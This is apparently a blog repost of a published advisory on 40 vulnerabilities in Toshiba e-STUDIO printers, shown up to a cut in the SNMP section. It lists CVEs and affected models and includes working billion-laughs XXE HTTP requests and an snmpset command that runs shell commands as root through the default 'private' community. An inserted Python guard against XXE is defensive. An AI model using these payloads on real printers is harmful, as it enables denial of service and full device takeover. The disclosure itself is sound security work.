{"id":57884,"date":"2024-07-04T19:30:20","date_gmt":"2024-07-04T16:30:20","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179367\/2024-toshiba-mfp.txt"},"modified":"2024-07-04T19:30:20","modified_gmt":"2024-07-04T16:30:20","slug":"toshiba-multi-function-printers-40-vulnerabilities","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/toshiba-multi-function-printers-40-vulnerabilities\/","title":{"rendered":"Toshiba Multi-Function Printers 40 Vulnerabilities"},"content":{"rendered":"<p>Hello,<\/p>\n<p>Please find a text-only version below sent to security mailing lists.<\/p>\n<p>The complete version on &#8220;40 vulnerabilities in Toshiba Multi-Function<br \/>Printers&#8221; is posted here:<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html<\/p>\n<p>The text version is also posted here:<br \/>https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt<\/p>\n<p>=== text-version of the advisory ===<\/p>\n<p>-----BEGIN PGP SIGNED MESSAGE-----<br \/>Hash: SHA512<\/p>\n<p>## Advisory Information<\/p>\n<p>Title: 40 vulnerabilities in Toshiba Multi-Function Printers<br \/>Advisory URL: https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt<br \/>Blog URL: https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html<br \/>Date published: 2024-06-27<br \/>Vendors contacted: Toshiba<br \/>Release mode: Released<br \/>CVE: CVE-2024-27141, CVE-2024-27142, CVE-2024-27143, CVE-2024-27144,<br \/>CVE-2024-27145, CVE-2024-27146, CVE-2024-27147, CVE-2024-27148,<br \/>CVE-2024-27149, CVE-2024-27150, CVE-2024-27151, CVE-2024-27152,<br \/>CVE-2024-27153, CVE-2024-27154, CVE-2024-27155, CVE-2024-27156,<br \/>CVE-2024-27157, CVE-2024-27158, CVE-2024-27159, CVE-2024-27160,<br \/>CVE-2024-27161, CVE-2024-27162, CVE-2024-27163, CVE-2024-27164,<br \/>CVE-2024-27165, CVE-2024-27166, CVE-2024-27167, CVE-2024-27168,<br \/>CVE-2024-27169, CVE-2024-27170, CVE-2024-27171, 
CVE-2024-27172,<br \/>CVE-2024-27173, CVE-2024-27174, CVE-2024-27175, CVE-2024-27176,<br \/>CVE-2024-27177, CVE-2024-27178, CVE-2024-27179, CVE-2024-27180<\/p>\n<p>## Product description<\/p>\n<p>&gt; e-STUDIO Multi-Function Printers (MFPs) are fast and productive, providing businesses and organisations the capability to produce what you need, when you need it.<br \/>&gt;<br \/>&gt; From https:\/\/www.toshibatec.co.uk\/workplace-solutions\/products-and-solutions\/mfps-and-printers\/<\/p>\n<p>## Vulnerability Summary<\/p>\n<p>Vulnerable versions: 103 different models of Toshiba Multi-Function<br \/>Printers (MFP) are vulnerable. It is recommended to visit the official<br \/>Toshiba advisory<br \/>(https:\/\/www.toshibatec.com\/information\/20240531_01.html), review the<br \/>list of affected printers<br \/>(https:\/\/www.toshibatec.com\/information\/pdf\/information20240531_01.pdf),<br \/>apply security patches and replace unsupported MFP models.<\/p>\n<p>The summary of the vulnerabilities is as follows:<\/p>\n<p>1. CVE-2024-27141 &#8211; Pre-authenticated Blind XML External Entity (XXE)<br \/>injection &#8211; DoS<br \/>2. CVE-2024-27142 &#8211; Pre-authenticated XXE injection<br \/>3. CVE-2024-27143 &#8211; Pre-authenticated Remote Code Execution as root<br \/>4. CVE-2024-27144 &#8211; Pre-authenticated Remote Code Execution as root or<br \/>apache and multiple Local Privilege Escalations<br \/>4.1. Remote Code Execution &#8211; Upload of a new .py module inside WSGI<br \/>Python programs<br \/>4.2. Remote Code Execution &#8211; Upload of new .ini configuration files<br \/>inside WSGI Python programs<br \/>4.3. Remote Code Execution &#8211; Upload of a malicious script<br \/>`\/tmp\/backtraceScript.sh` and injection of malicious gdb commands<br \/>4.4. Remote Code Execution &#8211; Upload of a malicious<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` program<br \/>4.5. Remote Code Execution &#8211; Upload of malicious libraries<br \/>4.6. 
Other ways to get Remote Code Execution<br \/>5. CVE-2024-27145 &#8211; Multiple Post-authenticated Remote Code Executions as root<br \/>6. CVE-2024-27146 &#8211; Lack of privilege separation<br \/>7. CVE-2024-27147 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using snmpd<br \/>8. CVE-2024-27148 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure PATH<br \/>9. CVE-2024-27149 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure LD_PRELOAD<br \/>10. CVE-2024-27150 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure LD_LIBRARY_PATH<br \/>11. CVE-2024-27151 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure permissions for 106 programs<br \/>11.1. 3 vulnerable programs not running as root<br \/>11.2. 103 vulnerable programs running as root<br \/>12. CVE-2024-27152 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure permissions for libraries<br \/>12.1. Example with `\/home\/SYSROM_SRC\/bin\/syscallerr`<br \/>13. CVE-2024-27153 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using CISSM<br \/>14. CVE-2024-27154 and CVE-2024-27155 &#8211; Passwords stored in clear-text<br \/>logs and insecure logs<br \/>14.1. Clear-text password written in logs when a user logs into the printer<br \/>14.2. Clear-text password written in logs when a password is modified<br \/>15. CVE-2024-27156 &#8211; Leak of authentication sessions in insecure logs<br \/>in \/ramdisk\/work\/log directory<br \/>16. CVE-2024-27157 &#8211; Leak of authentication sessions in insecure logs<br \/>in \/ramdisk\/al\/network\/log directory<br \/>17. CVE-2024-27158 &#8211; Hardcoded root password<br \/>18. CVE-2024-27159 &#8211; Hardcoded password used to encrypt logs<br \/>19. CVE-2024-27160 &#8211;  Hardcoded password used to encrypt logs and use<br \/>of a weak digest cipher<br \/>20. 
CVE-2024-27161 &#8211; Hardcoded password used to encrypt files<br \/>21. CVE-2024-27162 &#8211; DOM-based XSS present in the \/js\/TopAccessUtil.js file<br \/>22. CVE-2024-27163 &#8211; Leak of admin password and passwords<br \/>23. CVE-2024-27164 &#8211; Hardcoded credentials in telnetd<br \/>24. CVE-2024-27165 &#8211; Local Privilege Escalation using PROCSUID<br \/>25. CVE-2024-27166 &#8211; Insecure permissions for core files<br \/>26. CVE-2024-27167 &#8211; Insecure permissions used for Sendmail &#8211; Local<br \/>Privilege Escalation<br \/>27. CVE-2024-27168 &#8211; Hardcoded keys found in Python applications used<br \/>to generate authentication cookies<br \/>28. CVE-2024-27169 &#8211; Lack of authentication in WebPanel &#8211; Local<br \/>Privilege Escalation<br \/>29. CVE-2024-27170 &#8211; Hardcoded credentials for WebDAV access<br \/>30. CVE-2024-27171 &#8211; Insecure permissions<br \/>31. CVE-2024-27172 &#8211; Remote Code Execution &#8211; command injection as root<br \/>32. CVE-2024-27173 &#8211; Remote Code Execution &#8211; insecure upload<br \/>33. CVE-2024-27174 &#8211; Remote Code Execution &#8211; insecure upload<br \/>34. CVE-2024-27175 &#8211; Local File Inclusion<br \/>35. CVE-2024-27176 &#8211; Remote Code Execution &#8211; insecure upload<br \/>36. CVE-2024-27177 &#8211; Remote Code Execution &#8211; insecure upload<br \/>37. CVE-2024-27178 &#8211; Remote Code Execution &#8211; insecure copy<br \/>38. CVE-2024-27179 &#8211; Session disclosure inside the log files in the<br \/>installation of applications<br \/>39. 
CVE-2024-27180 &#8211; TOCTOU vulnerability in the installation of<br \/>applications, allowing an attacker to install rogue applications and<br \/>obtain RCE<\/p>\n<p>CVE-2024-27171 to CVE-2024-27180 affect the third-party application<br \/>framework and the third-party applications installed by default in<br \/>Toshiba printers &#8211; this is an extremely interesting attack surface<br \/>for persistence.<\/p>\n<p>TL;DR: An attacker can compromise Toshiba Multi-Function Printers<br \/>using multiple vulnerabilities.<\/p>\n<p>List of vulnerable models of Toshiba Multi-Function Printers (103 models):<\/p>\n<p>2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC,<br \/>3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG,<br \/>6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG,<br \/>5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A,<br \/>7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC,<br \/>2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC,<br \/>3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A,<br \/>3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A,<br \/>3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC,<br \/>5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A,<br \/>5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC,<br \/>2005NC, 2505AC, 3005AC, 3505AC, 4505AC,<br \/>5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG,<br \/>5008A, 5506AC, 6506AC, 7506AC, 5508A,<br \/>6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP.<\/p>\n<p>_Miscellaneous notes_:<\/p>\n<p>This security assessment was entirely done using a blackbox approach<br \/>and fully-remote &#8211; I only had some IPs of printers (no physical access<br \/>and no credentials for admin or normal users). 
Consequently, the<br \/>physical security of the printers was not analyzed. The<br \/>vulnerabilities were confirmed on different models running the<br \/>latest firmware versions (e-STUDIO2010AC, e-STUDIO3005AC,<br \/>e-STUDIO3508A and e-STUDIO5018A).<\/p>\n<p>The vulnerabilities were communicated to Toshiba on June 14, 2023 and<br \/>communications with Toshiba were very effective.<\/p>\n<p>_Impacts_<\/p>\n<p>An attacker can compromise Toshiba multi-function printers (MFP) and<br \/>execute code. These printers run Linux and are powerful. They<br \/>are ideal to host implants (and fun programs, like Bettercap) and to<br \/>move laterally inside infrastructures.<\/p>\n<p>_Recommendations_<\/p>\n<p>- Use network segmentation to isolate MFPs.<br \/>- Apply security patches.<br \/>- Replace unsupported MFPs.<\/p>\n<p>## Details &#8211; Pre-authenticated Blind XML External Entity (XXE) injection &#8211; DoS<\/p>\n<p>The Toshiba printers use XML communication for the `\/contentwebserver`<br \/>API endpoint provided by the printer.<\/p>\n<p>This endpoint is managed by an Apache module located inside the<br \/>`mod_contentwebserver.so` library. This library provides XML parsing<br \/>and is vulnerable to a time-based blind XML External Entity (XXE)<br \/>vulnerability.<\/p>\n<p>Using a billion laughs payload (nested entity expansion), we can<br \/>confirm that the parser expands DTD-declared entities and that there<br \/>is a time-based blind XXE vulnerability. 
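An added example, not part of the advisory and not Toshiba's code: the pre-parse guard that a reverse proxy in front of the printer, or the `/contentwebserver` handler itself, could apply to every request body before it reaches the XML parser. It serves both this finding and the non-blind XXE in the next section: it refuses any DOCTYPE, any external (SYSTEM/PUBLIC) or parameter entity, and, without expanding anything, computes how many bytes the document's entity references would become, so the nested lol entities below are refused at 90,000 bytes of expansion instead of being expanded. The 10,000-byte limit, the three sample bodies and the function names are assumptions made for this example.

```python
"""Pre-parse guard for an XML API body that must never carry a DTD (added
example, not code from the advisory or Toshiba; MAX_EXPANSION and the sample
bodies are assumptions made for the example)."""
import re
import xml.etree.ElementTree as ET

MAX_EXPANSION = 10_000  # assumed ceiling on expanded entity text, in bytes

_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s>]+)\s+"
    rb"(?:(?P<ext>SYSTEM|PUBLIC)\b[^>]*|\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)')\s*>")
_EXTERNAL_DTD_RE = re.compile(rb"<!DOCTYPE[^>\[]*\b(SYSTEM|PUBLIC)\b")
_REF_RE = re.compile(rb"&([A-Za-z_][^\s&;]*);")  # named references only
_PREDEFINED = {b"lt", b"gt", b"amp", b"apos", b"quot"}


def _document_part(body: bytes) -> bytes:
    """Everything after the internal DTD subset (the whole body without DOCTYPE)."""
    start = body.find(b"<!DOCTYPE")
    if start < 0:
        return body
    end = body.find(b"]>", start)
    return body[end + 2:] if end >= 0 else body[body.find(b">", start) + 1:]


def _expanded_size(name: bytes, entities: dict, sizes: dict, stack: set) -> int:
    """Bytes that &name; produces once fully expanded; memoised, cycles are errors."""
    if name in sizes:
        return sizes[name]
    if name in _PREDEFINED:
        return 1
    if name not in entities:  # undeclared: the real parser rejects it anyway
        return len(name) + 2
    if name in stack:
        raise ValueError(f"recursive entity &{name.decode()};")
    stack.add(name)
    value, total, pos = entities[name], 0, 0
    for m in _REF_RE.finditer(value):  # literal text between references counts once
        total += (m.start() - pos) + _expanded_size(m.group(1), entities, sizes, stack)
        pos = m.end()
    total += len(value) - pos
    stack.discard(name)
    sizes[name] = total
    return total


def inspect_body(body: bytes) -> dict:
    """Classify a request body without expanding a single entity."""
    reasons, external, entities = [], [], {}
    if b"<!DOCTYPE" in body:
        reasons.append("DOCTYPE declaration present")
    if _EXTERNAL_DTD_RE.search(body):
        reasons.append("external DTD referenced")
    for m in _ENTITY_RE.finditer(body):
        name = m.group("name")
        if m.group("pe"):
            reasons.append(f"parameter entity %{name.decode()};")
        if m.group("ext"):
            external.append(name.decode())
        elif not m.group("pe"):
            entities[name] = m.group("dq") if m.group("dq") is not None else m.group("sq")
    if external:
        reasons.append("external entities: " + ", ".join(external))
    sizes = {}
    try:  # only references in the document part are expanded by a parser
        expansion = sum(_expanded_size(m.group(1), entities, sizes, set())
                        for m in _REF_RE.finditer(_document_part(body)))
    except ValueError as exc:
        reasons.append(str(exc))
        expansion = -1
    if expansion > MAX_EXPANSION:
        reasons.append(f"entity expansion {expansion} bytes > {MAX_EXPANSION}")
    return {"external_entities": external,
            "entity_sizes": {k.decode(): v for k, v in sizes.items()},
            "entity_expansion": expansion, "reasons": reasons,
            "verdict": "reject" if reasons else "allow"}


def parse_if_safe(body: bytes) -> ET.Element:
    """Hand the body to xml.etree only after the guard allowed it."""
    report = inspect_body(body)
    if report["verdict"] != "allow":
        raise ValueError("rejected XML body: " + "; ".join(report["reasons"]))
    return ET.fromstring(body)


def _entity(name: bytes, refs: list) -> bytes:
    return b'<!ENTITY %s "%s">' % (name, b"".join(b"&%s;" % r for r in refs))


# Constructed sample in the advisory's shape: lol5 = 3 x lol4, root references &lol5;.
BILLION_LAUGHS = b"\n".join([
    b"<!DOCTYPE lolz [", b'<!ENTITY lol "lol">', b"<!ELEMENT lolz (#PCDATA)>",
    _entity(b"lol1", [b"lol"] * 10), _entity(b"lol2", [b"lol1"] * 10),
    _entity(b"lol3", [b"lol2"] * 10), _entity(b"lol4", [b"lol3"] * 10),
    _entity(b"lol5", [b"lol4"] * 3), b"]>", b"<lolz>&lol5;</lolz>"])
# Constructed sample: classic file-read XXE in the same request shape.
XXE_FILE_READ = (b'<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 b"<DeviceInformationModel><X>&xxe;</X></DeviceInformationModel>")
# Constructed sample: a benign request body with no DTD at all.
CLEAN = (b'<?xml version="1.0"?><DeviceInformationModel><GetValue>'
         b"<UserManager><View><Users/></View></UserManager></GetValue>"
         b"</DeviceInformationModel>")
```

`inspect_body` returns the reasons next to the numbers, which is what a proxy should log; `parse_if_safe` is the only function that hands bytes to `xml.etree`, and only after the verdict is `allow`. The count is one regex pass plus memoised recursion over the declared entities, so the guard itself cannot be driven into the CPU exhaustion it is meant to block.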
When sending a single reference (&amp;lol1;) inside the lolz root<br \/>element, &amp;lol1; expands into 10 copies of &amp;lol; and the request<br \/>takes 200ms.<\/p>\n<p>With an entity that expands into:<\/p>\n<p>- 10 x 10 = 100 copies, the request takes 206ms;<br \/>- 10 x 10 x 10 = 1,000 copies, the request takes 541ms;<br \/>- 10 x 10 x 10 x 10 = 10,000 copies, the request takes 2.7s;<br \/>- 10 x 10 x 10 x 10 x 2 = 20,000 copies, the request takes 8.8s;<br \/>- 10 x 10 x 10 x 10 x 4 = 40,000 copies, the request takes 30.9s.<\/p>\n<p>Even though the Apache server replies `MODULE_ERROR:SendRequest failed`,<br \/>the XML has been fully evaluated by the `mod_contentwebserver.so`<br \/>library running on the remote printer: the response time grows with<br \/>the expansion size.<\/p>\n<p>The payload is:<\/p>\n<p>POST \/contentwebserver HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: *\/*<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Cache-Control: no-cache<br \/>Pragma: no-cache<br \/>Content-Type: text\/plain; charset=utf-8<br \/>csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0<br \/>Content-Length: 759<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS<br \/>Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS;<br \/>IgnoreSessionTimeout=1<\/p>\n<p>&lt;!DOCTYPE lolz [<br \/>&lt;!ENTITY lol &quot;lol&quot;&gt;<br \/>&lt;!ELEMENT lolz (#PCDATA)&gt;<br \/>&lt;!ENTITY lol1 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;<br \/>&lt;!ENTITY lol2<br \/>&quot;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&quot;&gt;<br \/>&lt;!ENTITY lol3<br 
\/>&quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;<br \/>&lt;!ENTITY lol4<br \/>&quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;<br \/>&lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;<br \/>&lt;!ENTITY lol6<br \/>&quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;<br \/>&lt;!ENTITY lol7<br \/>&quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;<br \/>&lt;!ENTITY lol8<br \/>&quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;<br \/>&lt;!ENTITY lol9<br \/>&quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;<br \/>]&gt;<br \/>&lt;lolz&gt;&amp;lol5;&lt;\/lolz&gt;<\/p>\n<p>Using this HTTP request inside Burp (with a valid session obtained by<br \/>browsing the printer without authentication), we can modify the entity<br \/>referenced on the last line and confirm that the XML is parsed by<br \/>comparing the time the printer needs to process the request.<\/p>\n<p>The time will appear inside Burp on the bottom-right of the window (in<br \/>red in the following screenshots):<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>With an entity expanding into 10 x 10 x 10 x 10 x 4 = 40,000 copies,<br \/>the request takes 30 seconds.<\/p>\n<p>HTTP requests with deeper entity nesting (more XML entities to<br \/>expand) will DoS the printer: its CPU runs at 100%.<\/p>\n<p>The XML parser is vulnerable to XXE, without authentication.<\/p>\n<p>File exfiltration over HTTP, FTP and gopher was not obtained, as<br \/>some protections seem to be implemented in the XML parser.<\/p>\n<p>## Details &#8211; Pre-authenticated XXE injection<\/p>\n<p>The Toshiba printers use XML communication for the `\/contentwebserver`<br \/>API endpoint provided by the printer.<\/p>\n<p>This endpoint is managed by an Apache module located inside the<br \/>`mod_contentwebserver.so` library. This library provides XML parsing<br \/>and is vulnerable to an XML External Entity (XXE) vulnerability.<\/p>\n<p>Using a billion laughs payload wrapped in correctly formatted data for<br \/>the printer (the Toshiba-specific, non-public DTD: these tags are<br \/>interpreted by the remote printer), we can confirm the presence of an<br \/>XXE vulnerability. The resulting evaluated XML is echoed back by<br \/>the printer:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>The malicious payload is (containing a `&lt;X&gt;&amp;lol4;&lt;\/X&gt;`):<\/p>\n<p>POST \/contentwebserver HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: *\/*<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Cache-Control: no-cache<br \/>Pragma: no-cache<br \/>Content-Type: text\/plain; charset=utf-8<br \/>csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d<br \/>Content-Length: 1226<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/CreateNewPwd.html<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0;<br \/>addrLastVisited=ADDRBK;<br \/>Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d;<br \/>PREF=%7BList%2C8%2CClip<br \/>boardForPage-%7D; 
PROGSTAT=0<\/p>\n<p>&lt;!DOCTYPE lolz [<br \/>&lt;!ENTITY lol &quot;lol&quot;&gt;<br \/>&lt;!ELEMENT lolz (#PCDATA)&gt;<br \/>&lt;!ENTITY lol1 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;<br \/>&lt;!ENTITY lol2<br \/>&quot;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&quot;&gt;<br \/>&lt;!ENTITY lol3<br \/>&quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;<br \/>&lt;!ENTITY lol4<br \/>&quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;<br \/>&lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;<br \/>&lt;!ENTITY lol6<br \/>&quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;<br \/>&lt;!ENTITY lol7<br \/>&quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;<br \/>&lt;!ENTITY lol8<br \/>&quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;<br \/>&lt;!ENTITY lol9<br \/>&quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;<br \/>]&gt;<br \/>&lt;?xml version=&quot;1.0&quot;?&gt;<br \/>&lt;DeviceInformationModel&gt;<br \/>&lt;GetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users\/&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/GetValue&gt;<br \/>&lt;SetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users&gt;<br \/>&lt;User&gt;<br \/>&lt;Information&gt;<br \/>&lt;X&gt;&amp;lol4;&lt;\/X&gt;<br \/>&lt;\/Information&gt;<br \/>&lt;\/User&gt;<br \/>&lt;\/Users&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/SetValue&gt;<br \/>&lt;Command&gt;<br \/>&lt;ForgotPassword&gt;<br 
\/>&lt;commandNode&gt;UserManager\/Users&lt;\/commandNode&gt;<br \/>&lt;Params&gt;<br \/>&lt;userDetails<br \/>contentType=&quot;XPath&quot;&gt;UserManager\/View\/Users\/User&lt;\/userDetails&gt;<br \/>&lt;cmdDetails commandType=&quot;Reset&quot;\/&gt;<br \/>&lt;\/Params&gt;<br \/>&lt;\/ForgotPassword&gt;<br \/>&lt;\/Command&gt;<br \/>&lt;\/DeviceInformationModel&gt;<\/p>\n<p>And the response will be:<\/p>\n<p>HTTP\/1.1 200 OK<br \/>Date: Wed, 27 May 2023 10:54:12 GMT<br \/>Server: Apache<br \/>X-Frame-Options: SAMEORIGIN<br \/>Cache-Control: max-age=63072000<br \/>Accept-Language: en-US,en;q=0.5<br \/>Connection: close<br \/>Content-Type: text\/xml<br \/>Content-Length: 30465<\/p>\n<p>&lt;?xml version=&quot;1.0&quot;?&gt;<br \/>&lt;DeviceInformationModel&gt;<br \/>&lt;GetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users&gt;<br \/>&lt;User&gt;<br \/>&lt;Information&gt;<\/p>\n<p>&lt;X&gt;lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[&#8230;]lollollollollol&lt;\/X&gt;<br \/>&lt;\/Information&gt;<br \/>&lt;\/User&gt;<br \/>&lt;\/Users&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/GetValue&gt;<br \/>&lt;Command&gt;<br \/>&lt;ForgotPassword&gt;<br \/>&lt;commandNode&gt;UserManager\/Users&lt;\/commandNode&gt;<br \/>&lt;Params&gt;<br \/>&lt;userDetails<br \/>contentType=&quot;XPath&quot;&gt;UserManager\/View\/Users\/User&lt;\/userDetails&gt;<br \/>&lt;cmdDetails commandType=&quot;Reset&quot;\/&gt;<br \/>&lt;\/Params&gt;<br \/>&lt;Response&gt;<br \/>&lt;statusOfOperation&gt;STATUS_FAILED&lt;\/statusOfOperation&gt;<br \/>&lt;\/Response&gt;<br \/>&lt;\/ForgotPassword&gt;<br \/>&lt;\/Command&gt;<br 
\/>&lt;\/DeviceInformationModel&gt;<br \/>kali%<\/p>\n<p>The XML parser is vulnerable to XXE, without authentication.<\/p>\n<p>An attacker can exploit the XXE to retrieve information.<\/p>\n<p>Exploitability was not analyzed in depth since an RCE was found at the<br \/>same time: Pre-authenticated Remote Code Execution as root.<\/p>\n<p>## Details &#8211; Pre-authenticated Remote Code Execution as root<\/p>\n<p>It was observed that the Toshiba printers use SNMP for configuration.<\/p>\n<p>By default, these communities are used:<\/p>\n<p>- `public` for read-only access;<br \/>- `private` for read\/write access.<\/p>\n<p>Using the `private` community, it is possible to remotely execute<br \/>commands as root on the printer: snmpd runs as root and exposes the<br \/>`NET-SNMP-EXTEND-MIB`, so SNMP write access is command execution.<\/p>\n<p>For example, these commands execute `id` as root on<br \/>the remote printer:<\/p>\n<p>kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus.&quot;cmd&quot;' = createAndGo 'nsExtendCommand.&quot;cmd&quot;' = \/bin\/sh<br \/>'nsExtendArgs.&quot;cmd&quot;' = '-c id'<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: -c id<\/p>\n<p>kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: -c id<br \/>NET-SNMP-EXTEND-MIB::nsExtendInput.&quot;cmd&quot; = STRING:<br \/>NET-SNMP-EXTEND-MIB::nsExtendCacheTime.&quot;cmd&quot; = INTEGER: 5<br 